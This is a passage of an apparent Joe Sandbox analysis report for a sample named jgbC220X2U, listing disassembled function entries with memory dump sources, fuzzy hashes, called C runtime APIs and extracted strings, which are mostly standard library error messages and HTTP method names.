                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 729ef516162f12b17a0891df4f125fc938104514095bee297d3f8b04a085cc37
                • Instruction ID: d8790b7c54407cf55b4b5e06ec68436e791e9dc03fac10550faadb4aadfd02bd
                • Opcode Fuzzy Hash: 729ef516162f12b17a0891df4f125fc938104514095bee297d3f8b04a085cc37
                • Instruction Fuzzy Hash: 49012472B04B158EF740DF69D8402AC37B0EB48788F444874DA1D97B68EB78DA518BA0
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: CaptureContextUnwindabort
                • String ID:
                • API String ID: 747564614-0
                • Opcode ID: dfe3689a1a1bc98ad94ef8f52801c85596f2cbabbcd0db76e3036f3fa39c646d
                • Instruction ID: 248091e501c066a56d7a34347e1a50aa6b5ee9a17547bc7ba5ec0051d35e8c42
                • Opcode Fuzzy Hash: dfe3689a1a1bc98ad94ef8f52801c85596f2cbabbcd0db76e3036f3fa39c646d
                • Instruction Fuzzy Hash: 4AC01200E9E14340FAA87FA12C0A5F9C23AAF0BB80F8838B0E40F361C36C1DA0002CB4
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: CaptureContextUnwindabort
                • String ID:
                • API String ID: 747564614-0
                • Opcode ID: 8c2be97f59e9b7290bea613212717df200ff73620f1f074a803c95ead892f177
                • Instruction ID: 45bfe1f474acb72769e29a733a1264655dd9584c279b54f47a7d708997be5199
                • Opcode Fuzzy Hash: 8c2be97f59e9b7290bea613212717df200ff73620f1f074a803c95ead892f177
                • Instruction Fuzzy Hash: 18C0CA14D4E21300F6A83FA12C0A4F9C02AAF47780F9838B0E80F261C36C0CA00029B5
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: CaptureContextUnwindabort
                • String ID:
                • API String ID: 747564614-0
                • Opcode ID: de9fada1d57f3fb15480b250e1812cc584fade96b87908de3236a1229bb3777a
                • Instruction ID: b2764f923d1f2097cb6f825084c5f1eb5c66073a0923a944884fc16561a6bbe4
                • Opcode Fuzzy Hash: de9fada1d57f3fb15480b250e1812cc584fade96b87908de3236a1229bb3777a
                • Instruction Fuzzy Hash: 20B09200D9E18390FAB43F512C095B8C679AF0BBC1E983CB0E41F361C36C1DE0002878
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: CaptureContextUnwindabort
                • String ID:
                • API String ID: 747564614-0
                • Opcode ID: e33d14cd70c7e249bad65a7e939737c55a2a044ab9b5064f473529a0d0db1fad
                • Instruction ID: bd6684726f49134a542205bd2571ec82889b6d0643c46a65c328a319f1b6ad07
                • Opcode Fuzzy Hash: e33d14cd70c7e249bad65a7e939737c55a2a044ab9b5064f473529a0d0db1fad
                • Instruction Fuzzy Hash: E9B04825D4E24340F6A43E911C094B8C06AEF4B780EA838B1D80E261C3AC0CA0412978
                APIs
                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,%s: __pos (which is %zu) > this->size() (which is %zu)), ref: 00007FF729FBCD28
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDA1
                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDB8
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDCA
                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDD2
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDDC
                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCDF3
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE09
                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE11
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE1D
                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE38
                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE48
                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729FBCE63
                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729FBCE68
                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C522A
                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5232
                  • Part of subcall function 00007FF729F8BD60: strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729F8BDE5
                  • Part of subcall function 00007FF729F8BD60: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729F8BDFE
                  • Part of subcall function 00007FF729F8BD60: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF729F8BE09
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: __acrt_iob_func$fwrite$abortfputsfreememcpy$strlen
                • String ID: for for$%s: __pos (which is %zu) > this->size() (which is %zu)$): $bmit ful$bmit ful$gcc.gnu.$gh space$https://$https://$l bug re$l bug re$lease su$mat expa$not enou$nsion (P$org/bugs$port at $port at $rg/bugs/$terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                • API String ID: 843327088-170750575
                • Opcode ID: 9873b8585aa86bd0548a47e0d311a7902b6b8965eeda163c35c21c4eb738ea66
                • Instruction ID: c84160c01dbbf9a186c93add847279d9a85c25ea2049da35177a0fe64b22a496
                • Opcode Fuzzy Hash: 9873b8585aa86bd0548a47e0d311a7902b6b8965eeda163c35c21c4eb738ea66
                • Instruction Fuzzy Hash: 8861E521F0879285FB20AF61BC406ADA675FB45B94F944235EE9C17B89EF3CD201DB21
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strlen
                • String ID: CONNECT$DELETE$GET$HEAD$HTTP/1.0$HTTP/1.1$OPTIONS$PATCH$POST$PRI$PUT$TRACE
                • API String ID: 39653677-2986041609
                • Opcode ID: 3475a15ad770d4e6921d672ba9c000cce732cdae77ded85629d71d3a8339cbcc
                • Instruction ID: f4dbc1a765788a78caa6a449592934ca20c1c750e11ed0c5519d58d263adba4e
                • Opcode Fuzzy Hash: 3475a15ad770d4e6921d672ba9c000cce732cdae77ded85629d71d3a8339cbcc
                • Instruction Fuzzy Hash: BCD11A76B05B8299EF70EF61EC543E863A5EB09788F844476CE0C4B79AEE28D345C750
                APIs
                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FA40BD,?,?,00007FF729F81146,?,00007FF72A0C5058), ref: 00007FF72A0C5000
                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FA40BD,?,?,00007FF729F81146,?,00007FF72A0C5058), ref: 00007FF72A0C5010
                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FA40BD,?,?,00007FF729F81146,?,00007FF72A0C5058), ref: 00007FF72A0C5020
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: abort
                • String ID: what():
                • API String ID: 4206212132-593870882
                • Opcode ID: 951b2c14509b3b9ff06c7abb2130c4da9bb5aeb666ea34170b424332013cfbfb
                • Instruction ID: bcd546c3b4c57166100960d39018ee692ad2a6e6b6073145b1a5e11fb3a10ead
                • Opcode Fuzzy Hash: 951b2c14509b3b9ff06c7abb2130c4da9bb5aeb666ea34170b424332013cfbfb
                • Instruction Fuzzy Hash: 89513B50E1960740FB64BF6AAC6A3FD9262EF45B80FC85471E90D473C3EE2DE2019A71
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: ExceptionRaiseUnwindabort
                • String ID: CCG $CCG!$CCG!$CCG"
                • API String ID: 4140830120-3707373406
                • Opcode ID: 93c96baf85275308103f298f691ed14aa899bab17562764589f220c8c6e58548
                • Instruction ID: 50ce2a3e066c72fc401fc6a2fd01f0b43cb6fc390e1d7be0c19f60a27ca9ca88
                • Opcode Fuzzy Hash: 93c96baf85275308103f298f691ed14aa899bab17562764589f220c8c6e58548
                • Instruction Fuzzy Hash: A6518337909A8482E7A09F15E8446ADB370FF89B94F985135EE8D53758DF3DD581CB00
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: basic_filebuf::underflow codecvt::max_length() is not valid$basic_filebuf::underflow error reading the file$basic_filebuf::underflow incomplete character in file$basic_filebuf::underflow invalid byte sequence in file
                • API String ID: 0-2144588626
                • Opcode ID: 362a2d38bbbbf31715e0719b18adde177ff10ffcb86f89a7e4253875bb620e7b
                • Instruction ID: bd767ac5baea2dc67180a9f03da6b60b051201449ac789477e4a9ea8e02f9964
                • Opcode Fuzzy Hash: 362a2d38bbbbf31715e0719b18adde177ff10ffcb86f89a7e4253875bb620e7b
                • Instruction Fuzzy Hash: 66F19522E05B8684FB60AF25C9443B9A3A1FB55F98F988375DE4D07395EF38D484CB60
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: basic_filebuf::underflow codecvt::max_length() is not valid$basic_filebuf::underflow error reading the file$basic_filebuf::underflow incomplete character in file$basic_filebuf::underflow invalid byte sequence in file
                • API String ID: 0-2144588626
                • Opcode ID: 92b7329270e53ff97e577b768c53ed15714b72b2be74af88e6977060e2dbc436
                • Instruction ID: ee2cfbb4fe06b5d2cec631012cd0f2e303ee764c4ee6ecb3feaaea01b414d9ac
                • Opcode Fuzzy Hash: 92b7329270e53ff97e577b768c53ed15714b72b2be74af88e6977060e2dbc436
                • Instruction Fuzzy Hash: E8E18022E05B8684FB60BF25D940379A360EB56B9CF988271CF4D1B799EF38D485C760
                APIs
                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C50F0
                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C50FD
                  • Part of subcall function 00007FF72A0C45E0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF72A0C66D3,?,?,?,?,00007FF72A074BA7,?,?,?,?,00007FF72A072262), ref: 00007FF72A0C45EF
                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C51FA
                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C520C
                • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5220
                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C522A
                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF72A0BA8C3,?,?,?,?,00007FF72A0C46CD,?,?,00000060,00007FF72A0C4BA1,000000B0,basic_string::_M_create), ref: 00007FF72A0C5232
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: abort$fputcfputsfreefwritemalloc
                • String ID: what():
                • API String ID: 1809443324-593870882
                • Opcode ID: 87408ad0603ee8c41e1c4c8ef6072651e9f498a21ed56660e3a7948d2144ccf6
                • Instruction ID: 1603cc95863f0f90d0f26ea46a7e5182323b464a3101998949101579f942206f
                • Opcode Fuzzy Hash: 87408ad0603ee8c41e1c4c8ef6072651e9f498a21ed56660e3a7948d2144ccf6
                • Instruction Fuzzy Hash: E7312114E0D61340FAA4BFA5AC662BDD166EF45B80FC40475E90E473C3ED1DF2015A71
                APIs
                • memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF72A025455
                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A025636
                  • Part of subcall function 00007FF72A0260C0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF72A024C42,?,?,?,?,?,?,?,00007FF72A024728), ref: 00007FF72A02613B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy$memset
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                • API String ID: 438689982-1339558951
                • Opcode ID: 6c96ead74b821af78bfc087cc1d54b1b06c1ab8aa585e92059c8ef8ef73b6b55
                • Instruction ID: 20488de40e7a64bc7762cb9bcfc53571c65adaaf27b6b929b69b436e6f12cbc2
                • Opcode Fuzzy Hash: 6c96ead74b821af78bfc087cc1d54b1b06c1ab8aa585e92059c8ef8ef73b6b55
                • Instruction Fuzzy Hash: 0F51B162B4979342FA317B6A9D640BC9251DF01FD4FD841B2DE0C077D2ED2DE5828B24
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: strlen
                • String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
                • API String ID: 39653677-1250104765
                • Opcode ID: b298e40e8326073e78d25982d3ccf826324563d84e6940b60b221b93fb5c4db7
                • Instruction ID: 7027c460457cd2d9ea0882003f218bd53f75b2e48839dd89099c8ebd167ead77
                • Opcode Fuzzy Hash: b298e40e8326073e78d25982d3ccf826324563d84e6940b60b221b93fb5c4db7
                • Instruction Fuzzy Hash: 6C515362B59B1641EE65BF16EC500ECA321EB48F94BC90472DD0D0B765EE3CEA87D720
                APIs
                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A01C6BC
